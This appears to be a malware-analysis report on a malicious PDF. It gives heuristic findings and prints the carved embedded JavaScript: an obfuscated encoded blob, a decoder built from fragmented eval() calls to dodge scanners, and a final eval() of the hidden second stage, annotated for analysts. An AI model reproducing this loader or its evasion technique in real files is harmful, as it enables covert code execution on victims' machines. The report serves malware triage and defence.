MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream itself is heavily obfuscated, and a high-confidence PDF_EVAL hit indicates dynamic code execution. The script reconstructs a string at runtime and executes it, a common technique for downloading and running second-stage malware. The authoring application 'Scribus' is unusual for malicious PDFs, but the producer string is document metadata that the author controls and carries little weight; the obfuscated, self-executing JavaScript is a strong indicator of malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action — low — 2 related findings — PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster — critical — PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
stream function UClwxlP2() {var datfield = 'T3H'+'@Gpa'+'bfw0TG'+'EOZVpb7T'+'B0JUpbiGlH@hbbh'+'mOQJwwx@B'+'0xH'+'2p'+'Q0fj'+'WT'+'I0EHf45VA4'+'J@kbp'+'J1E'+'xC4n0'+'yAaamZn@JpDgMg0ammpp2H0hHDpahMpWJUHYJnREf'+'W44HMQf0J'+'j77Zn@JpDgMg0'+'pbMpWJU'+'HYJnRfm@f7mMpWJUHY'+'JnR5'+'aa'+'ppJ1ExC4n0yApb7TNhs'+'DtW'+'Dy4g'+'V2eH2XRf2G0'+'4H'+'Mba'+'sW5'+'4XDhqDdDzfG'+'HpaT'+'j'+'HJB4EV2pp'+'J1ExC4n'+'0yAZ7ma'+'pQJw'+'wx@B0'+'xH2pp0zl5'+'Cxnh'+'Ck'+'bg2HHammpQ2ZlfmDpOT3'+'0'+'zsTf7m1WfsipO@1ehsiZ7m8x4VTjm08KhTP0Eb … endstream -
Embedded JS stream — low — PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x38C | 5883 bytes |

SHA-256: 65d6d0ba83eb7620898b99d2e6ec7ce6aa814ecbc10fbba1bf661a287c093ee9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script — First 1,000 lines of the extracted script:
// Carved PDF /JS object, reproduced as extracted. UClwxlP2 holds an encoded
// blob (datfield) and a decoder (w5RFqmg8eu) whose only use of its output is
// eval() of the decoded text. The decoded second stage is not shown on this
// page, so what it does cannot be determined from here. The line break inside
// the datfield literal (between '0 and G0hHOl) is most likely a display wrap
// from the report preview; as printed it would not parse.
function UClwxlP2() {var datfield = 'T3H'+'@Gpa'+'bfw0TG'+'EOZVpb7T'+'B0JUpbiGlH@hbbh'+'mOQJwwx@B'+'0xH'+'2p'+'Q0fj'+'WT'+'I0EHf45VA4'+'J@kbp'+'J1E'+'xC4n0'+'yAaamZn@JpDgMg0ammpp2H0hHDpahMpWJUHYJnREf'+'W44HMQf0J'+'j77Zn@JpDgMg0'+'pbMpWJU'+'HYJnRfm@f7mMpWJUHY'+'JnR5'+'aa'+'ppJ1ExC4n0yApb7TNhs'+'DtW'+'Dy4g'+'V2eH2XRf2G0'+'4H'+'Mba'+'sW5'+'4XDhqDdDzfG'+'HpaT'+'j'+'HJB4EV2pp'+'J1ExC4n'+'0yAZ7ma'+'pQJw'+'wx@B0'+'xH2pp0zl5'+'Cxnh'+'Ck'+'bg2HHammpQ2ZlfmDpOT3'+'0'+'zsTf7m1WfsipO@1ehsiZ7m8x4VTjm08KhTP0EbJ'+'0gMAu7maOb'+'22'+'4x'+'VixhVDbQmDEf'+'C'+'Au'+'OsDEfCAu'+'OsDE'+'fCAuOsD'+'Ef'+'sr'+'4q'+'iDE5sAE'+'ui'+'DEE'+'C8e'+'@'+'aDEfa1j'+'@aDEfa1OWsDEHXr'+'ROsDEHXGu'+'OsDEHXvn'+'@i'+'DEH'+'XfOWCDEEXr4ziDEE'+'X'+'rnqXD'+'Ef'+'avtuXDEfXrQWX'+'DEHXr'+'4qXD'+'EECBEqXD'+'EHXA5qXDEHarn7CDEfCG3z'+'sDEHarn'+'7C'+'DEECl4zCD'+'EHXrpO'+'sD'+'EHXr4qi'+'DEECB'+'EqXDEEihOOsD'+'EEC6WOCDEHX65@sD'+'EfsUOOsDEHXrxWsDE'+'HXr4qXD'+'EHiRnu'+'CDEE'+'ih'+'EqiDE5CU'+'WO'+'C'+'D'+'E'+'ECw5WsDEfsUE@s'+'DEHXrxuXDEHXr4qXDEHi'+'RnuCDEEihEzCDE5iRbOC'+'DEHs1EuX'+'DEfsU'+'j7'+'X'+'DEHXrp7'+'XDEHXr'+'4qXDEHiRnuCDEEih'+'E'+'zs'+'DEfs1WOCDEf'+'srlW'+'sDEfsU'+'W'+'uXDE'+'HXrRuiDEHX'+'r4qXDEHiRnu'+'CD'+'EEih'+'3qXDEE'+'sl'+'bOC'+'D'+'EfsR0'+'uCDEfsUEOCDEHX'+'rlW'+'aDEHXr4qXDEHiRnuCD'+'E'+'Hi'+'rnq'+'iDEf'+'X'+'U3u'+'X'+'DEHaRlOiDEEC85WCDEEXU5@'+'iDEHXfOuCDEHXr4'+'@XDE'+'Ei6EqX'+'D'+'EHaRnu'+'C'+'DEECBeqiDEHXvx@iDEHX'+'lb'+'WCDEE'+'CBjqCDEEX'+'Uj@iDEf'+'sUj@aDEH'+'Xrn7CD'+'EHX'+'r4qXDEfaUjqX'+'D'+'E'+'EXwu@aDEH'+'a'+'rRmsDE5CfOOCDEHXr4qXDEEC8'+'EqXDE'+'EXA5@iDEEsRn7'+'CDEEsrnOiDEEC8jqXDE5irx@iDEHs'+'1WOCDEHXr4qXDEE'+'ir'+'4qX'+'DEHiRn7CD'+'Ef'+'aw3qiDEEi8EmXD'+'EE'+'iRn7CDEfsU3z'+'CDEHX'+'rbWXDEH'+'Xr4q'+'XDEH'+'iR4ziD'+'EEsfeqX'+'DEEiAEqXDE5i6HWsDEEsfWW'+'iDEHXv'+'xqXD'+'EfaR0OCDEHXr4qXDE'+'H'+'aRx7sDEECBe'+'q'+'X'+'DEHXA5@iDEHXlbWCDEECBjqCDEEXUj@iDEHirpOCD'+'EHXr'+'4qXDE'+'fawEq'+'XDEEiUEmaD'+'EHi'+'R'+'4ziDEfXk'+'RqiDEE'+'i'+'kR7CDEHs'+'1jziDE5ir0Wi'+'DEEiklq'+'XDEH'+'iRn7CDEfaw3'+'zsDEE'+'i8E@'+'iDEEiRn7CDEfsU3'
+'zCDEHXrR'+'ziDEHX'+'r4qXDEHXrb'+'WC'+'DEHaR'+'x7sDE'+'ECBeqXDEH'+'XU5@iDEHXjbWCDEECBjq'+'CDE'+'EXUj@iDEEX'+'r'+'pOCDEHXr4qXDEfawEqX'+'DEECB'+'57'+'sDE'+'EXrx@'+'iDEHXlbWCD'+'EECBjqCD'+'EEXUj@'+'iD'+'EHX'+'rpOC'+'DEHXr4qXDEHil4qXDEEijl'+'m'+'CDEfsl4ziDEfsl4ziD'+'Efsl4'+'z'+'iDEfsl4ziDEfsA'+'3O'+'iDEEiwEqi'+'DE'+'ECBjziDEfsjRWCDEEijx7aDEf'+'srx7'+'sDEECBj@i'+'DEECBOOsDE'+'HXUHusD'+'EEi'+'G37CDEEihEz'+'sDE'+'Hakn7CDEEC'+'Buzs'+'DEEX6Hu'+'iDEHXk0OC'+'DEEih5OiDEHah37CDEHX'+'kRqXDEfXkxOiDEHi8juCDEfCG5@'+'XDEEsk4ziDEfX'+'k'+'l@'+'aDE'+'HX'+'15W'+'aD'+'EEXr4WsDE'+'HsjQ'+'@CDEHXUHuiDEE'+'s6'+'jWXDEHXk4'+'q'+'sDEH'+'irx7XDEHslp7CDEHs6u'+'m'+'CDEHaRl@sDEEiwOWi'+'DEfsB37CDEEiw37C'+'DE'+'HXkR'+'qiDEfaheusDEHXA37'+'CDE'+'ECB5mCDEEXAj'+'@CDE5sG'+'Ez'+'iDEHXvn'+'7CDEHXkn7CDEEi6jWiDEE'+'sjlqsDEH'+'Xr4'+'zCD'+'EHsvpOCDE'+'H'+'s15WsDEEiR'+'x'+'7sDEHiA'+'jmXD'+'EHi15qsDEHXrx@sDE5CB37aDE5C1N7CDEE'+'s'+'rRWi'+'DEEC8juXDEECwNusDEEC'+'fNOsDE'+'ECrnOsDE'+'Esln7X'+'DEE'+'C'+'w3WCDEEsrlu'+'X'+'DE5CB37aDE'+'ECk'+'n7XDEECwjuXD'+'EE'+'CwNuCD'+'E5'+'C'+'B3WXDEEsrtOsDE5C'+'hNOsDE5CBNOsDEECj'+'nWCD'+'E'+'EsrluXD'+'E'+'ECrnOiDEECB3WsDE5C1jW'+'XD'+'E5C'+'13'+'7aDEECheuXDE5sjn7CDE5s6e7'+'CDE5s6e7'+'aDE5C'+'A'+'juCDEECkt7sD'+'E5sBe7XXHpaT3H@Gpbyr0mb0x0sxlJ0Tf7m1WfC'+'1O7s1OOa'+'T3H@GpaHB70i'+'AEFmaOQiHn'+'u'+'0Ow@bFD0'+'DdR7'+'C270J2th2HpQhTjO'+'aT3H@Gpb@r'+'4'+'0'+'TYRYZTf7m'+'n'+'n@'+'Zf00@6HqM0pbfTWaHB70'+'iAEgh1W5sfH'+'paT3H@Gp'+'pJ1ExC4'+'n'+'0y'+'Apb7TEEHDR5@ZpHJHjbFw'+'07sh'+'OWFw0'+'7shO'+'um0T7'+'mMpWJUHYJnRfmaOQ0fjWTI0EHf45VA4J@kbpJ1E'+'xC4'+'n0yAa'+'amZn@JpDgMg0p'+'aT'+'3H@Gpa2Ihh'+'DB04J40mmaOahDpOT30'+'zsT'+'fam1WfC'+'1O7'+'s1O'+'WhV'+'EYXxbH'+'0Zx'+'WZ_0xaT3xHG'+'pah8x4VTWq2h30@'+'k'+'RHaaOOa'+'5'+'nHayx'+'xiA'+'077Bt'+'JHEQ'+'H'+'0y0JZmW'+'q2h30@kRHa@TbhTTfmfbEHplWCz6xD5nHayxxiA0WKTf7mMp'+'W'+'JUHY'+'JnR'+'fm@OQ'+'iHnu0Ow@'+'bF'+'D0D'+'dR7CmObWTffmy4EHiQH0VwhmhxYsFt4ZfpJ'+'2HHam'+'mpQ'+'2Zlfm'+'BhqJ'+'UHY0G0hH'+'OlgXTf7mZpfV23H0Dt'+'HJGnJJ'+'G'+'RH'+'0Vw4fB6xMBlH'+'02thh0T7mBhqJUHY'+'0
G0hHOl'+'gXTf7mBh'+'qJU'+'HY0'+'G'+'0hHOlgX'+'2jHJ1a0@i4hhV7FX'+'VNhfXj'+'bhmOQ2Zlfmd6'+'x08QY'+'Zlpb7TB0JU'+'pbi'+'Gl'+'H@hba2pnxC4D4V0ahT'+'_tqfib0@'+'Gxm2H'+'OWhWuHT'+'y'+'tWDJlH'+'0WaqMcwp'+'@Hx4VRQf'+'h'+'6H'+'afBhqJ'+'UHY0G0hHOlgX2eh0Z'+'l'+'Hi'+'BbQs0HpaTH4JTWah'+'d6x08QYZl'+'ZF'+'sQpb7aOaaT3Q'+'FTW'+'ahd6x08QYZlZJsQpb7aOb'+'sT3QFTegH@nfyg4zDGfFm7OQs'+'0O'+'aW7ppMVZ423D'+'@XqxWKT77m6H'+'b'+'hT7fW'+'TWpMVZ423D'+'@X'+'qp'+'WKTfW'+'7TN7my3amd6x08QYZlZJsQpa7T5WhT7fWTWpMVZ423D@Xqp'+'WKT77'+'mUHbhTTfm'+'@ZqVUHqJBemDU'+'bbhmOQ'+'2Zlfmd'+'n4T@hm0H'+'ax@yQYbTf'+'7mww0JAR0@14hh'+'XEb21'+'ehsi4b21'+'ehsilbhmOp2H0'+'hHD'+'bpMywz0pbh0WR4J3DEfW'+'44HMQf0T7'+'7mBuWawjWhTe'+'YJPZ0THbhH'+'inhyF'+'pphaOpMywz0pbh0WR4'+'J3D'+'5aTu'+'f0'+'0REfi6hHWx4@dQ5HG4hm'+'aOp'+'iVahHZl'+'4fi6hH'+'W4'+'x'+'@'+'B4@HZ'+'0hHxw4JVb'+'pbA4E'+'@JD7mX'+'jafb'+'R'+'5JFOpM'+'ywz0pbh0W'+'R4J3DHW0T7mapbW'+'THHMGK'+'5JgbfMwbbh'+'m3';
// Decoder for the blob above. tp, once split on '@', is a 75-entry table that
// is indexed by (charCode - 48), i.e. it maps input characters '0'..'z' to
// 6-bit values; the zero entries cover positions the alphabet does not use.
function w5RFqmg8eu(KqPi5lTk9){ var tp = '63@38@56@2@15@30@39@42@32@0@0@0@0@0@0@0@61@37@34@40@51@14@44@36@62@1@60@50@9@49@6@26@24@11@23@25@54@33@57@58@52@12@55@0@0@0@0@4@0@43@59@17@5@22@46@28@47@53@18@21@19@45@3@8@27@13@16@41@7@10@20@35@31@48@29';
// Locals: hktOi2 is the constant 0 (used as loop bound and initialiser);
// SqusSa counts remaining input characters; wwvz1NEr0 is the 1024-character
// chunk size; Q5lx59CvI9u7xo accumulates the decoded output; s8GOCguQJWT is
// the read cursor into the input; y1ypz3aw8j042H is the current bit offset;
// lFmRtu is the bit accumulator; A8OCXhi receives the split table.
var hktOi2=0, SqusSa=KqPi5lTk9.length, wwvz1NEr0=1024, fopuDgJwk5PVDc, rXTW9, Q5lx59CvI9u7xo='', s8GOCguQJWT=hktOi2, y1ypz3aw8j042H=hktOi2, lFmRtu=hktOi2, A8OCXhi=Array(); A8OCXhi = tp.split('@');
// Every loop initialiser and body statement is assembled from string
// fragments and run through eval(), presumably so that Math.ceil, Math.min,
// charCodeAt and String.fromCharCode never appear as literal tokens for
// static scanners. Outer loop: ceil(length / 1024) chunks. Inner loop:
// min(remaining, 1024) characters per chunk, decrementing the remaining count.
for(eval('rXTW9=Ma'+'th.'+'ce'+'il(SqusSa'+'/wwvz1NEr0)');rXTW9>hktOi2;rXTW9--){ for(eval('fopuDgJwk5PVDc=M'+'ath'+'.m'+'in(SqusSa,'+'wwvz1NEr0)');fopuDgJwk5PVDc>hktOi2;fopuDgJwk5PVDc--,SqusSa--){
// OR the next character's 6-bit table value into the accumulator at the
// current bit offset and advance the read cursor.
eval('lFmRtu|'+'=(A8OCXhi['+'KqPi5lTk9.'+'cha'+'rCo'+'de'+'At(s8GOCguQJWT+'+'+)-48])<'+'<y1ypz3aw8j042H');
// The bit offset cycles 0 -> 6 -> 4 -> 2 -> 0: the first character of each
// group of four only loads bits (offset 0 takes the else branch), and each of
// the next three emits one byte, so four input characters yield three output
// bytes. The emitted byte is (accumulator & 255) ^ 150, since & binds more
// tightly than ^; the accumulator is then shifted down by 8 bits.
if(y1ypz3aw8j042H){ eval('Q5lx59CvI9u7xo+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](150^'+'lFmRtu&'+'25'+'5)'); lFmRtu>>=8; y1ypz3aw8j042H-=2; } else { y1ypz3aw8j042H=6; } } }
// Execute the decoded text. This is the only use of the decoded output and
// the sink the report's eval-based heuristics refer to; for analysis the
// decoded stage can be recovered by capturing Q5lx59CvI9u7xo here instead of
// evaluating it.
eval(Q5lx59CvI9u7xo); } w5RFqmg8eu(datfield);}